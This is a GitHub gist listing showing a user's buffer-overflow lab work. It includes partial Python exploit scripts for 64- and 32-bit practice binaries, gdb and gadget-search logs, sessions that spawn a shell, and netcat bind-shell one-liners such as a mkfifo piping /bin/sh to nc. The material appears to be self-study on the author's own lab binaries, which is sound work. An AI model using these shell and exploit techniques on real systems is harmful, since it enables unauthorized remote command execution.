Skip to content

Instantly share code, notes, and snippets.

View fgsahoward's full-sized avatar

Austin Howard fgsahoward

5 followers · 0 following
View GitHub Profile
@fgsahoward
fgsahoward / med64_exploitation1
Created June 11, 2018 17:59
[howard@sterling bof]$ cat input | /home/howard/repos/bof/med64 /bin/sh -p 2>&1 | nc -l 127.0.0.1 -p 1234 >input &
[1] 5998
[howard@sterling bof]$ pidof med64
5997
[howard@sterling bof]$ python exploits/med64_exp.py 127.0.0.1 1234
b'Enter some text: '
# whoami
b'howard\n'
# ls
b'Makefile\nNOTES\ncore\neasy.c\neasy32\neasy64\nexp\nexploits\ngdb-env\ngdb-s.env\nhard.c\nhard32\ninput\nmed32\nmed64\noutput\nshell-s.env\nshell.env\nshellcodes\ntools\n'
@fgsahoward
fgsahoward / med64_exp.py
Created June 11, 2018 17:57
import os
import sys
import struct
import socket
word_size = 8
execve_address = 0x7ffff7af4470
argv_zero_address = 0x00007fffffffec31
argv_address = 0x7fffffffe980
@fgsahoward
fgsahoward / med64_debugging3
Created June 11, 2018 17:56
[howard@sterling bof]$ cat input | /home/howard/repos/bof/med64 /bin/sh -p 2>&1 | nc -l 127.0.0.1 -p 1234 >input &
[1] 5931
[howard@sterling bof]$ pidof med64
5930
[howard@sterling bof]$ sudo gdb -q ./med64 5930
Reading symbols from ./med64...(no debugging symbols found)...done.
Attaching to program: /home/howard/repos/bof/med64, process 5930
Reading symbols from /usr/lib/libc.so.6...(no debugging symbols found)...done.
Reading symbols from /lib64/ld-linux-x86-64.so.2...(no debugging symbols found)...done.
0x00007ffff7b174d0 in __read_nocancel () from /usr/lib/libc.so.6
@fgsahoward
fgsahoward / med64_debugging2
Created June 11, 2018 17:55
[howard@sterling bof]$ gdb -q ./med64
Reading symbols from ./med64...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
0x0000000000400643 <+0>:push %rbp
0x0000000000400644 <+1>:mov %rsp,%rbp
0x0000000000400647 <+4>:sub bashx20,%rsp
0x000000000040064b <+8>:mov %edi,-0x4(%rbp)
0x000000000040064e <+11>:mov %rsi,-0x10(%rbp)
0x0000000000400652 <+15>:mov %rdx,-0x18(%rbp)
@fgsahoward
fgsahoward / med64_debugging1
Created June 11, 2018 17:40
[howard@sterling bof]$ gcc -o med64 -fno-stack-protector med.c
[howard@sterling bof]$ ../rp/rp-lin-x64 -f ./med64 --atsyntax -r 3
Trying to open './med64'..
Loading ELF information..
FileFormat: Elf, Arch: x64
Using the AT&T syntax..
Wait a few seconds, rp++ is looking for gadgets..
in PHDR
0 found.
@fgsahoward
fgsahoward / med32_exploitation1
Created June 11, 2018 17:37
[howard@sterling bof]$ python exploits/med32_exp.py 127.0.0.1 1234
b'Enter some text: '
# whoami
b'howard\n'
# ls
b'core\neasy32\neasy64\neasy.c\nexp\nexploits\ngdb-env\ngdb-s.env\nhard32\nhard.c\ninput\nMakefile\nmed32\nmed64\nNOTES\noutput\nshellcodes\nshell.env\nshell-s.env\ntools\n'
@fgsahoward
fgsahoward / med32_exp.py
Created June 11, 2018 17:36
import os
import sys
import struct
import socket
word_size = 4
execve_address = 0xf7eac7c0
argv_zero_address = 0xffffdc37
argv_address = 0xffffdab8
envp_address = 0xffffdac4
@fgsahoward
fgsahoward / med32_debugging4
Created June 11, 2018 17:35
[howard@sterling bof]$ pidof med32
1929
[howard@sterling bof]$ sudo gdb -q ./med32 1929
Reading symbols from ./med32...(no debugging symbols found)...done.
Attaching to program: /home/howard/repos/bof/med32, process 1929
Reading symbols from /usr/lib32/libc.so.6...(no debugging symbols found)...done.
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
0xf7fd8c99 in __kernel_vsyscall ()
(gdb) x/xw 0xffffdab8
0xffffdab8: 0xffffdc37
@fgsahoward
fgsahoward / netcat_example2
Created June 11, 2018 17:34
[howard@sterling bof]$ cat input | /home/howard/repos/bof/med32 /bin/sh -p 2>&1 | nc -l 127.0.0.1 -p 1234 >input
@fgsahoward
fgsahoward / netcat_example1
Created June 11, 2018 17:33
$ rm -f /tmp/f; mkfifo /tmp/f
$ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f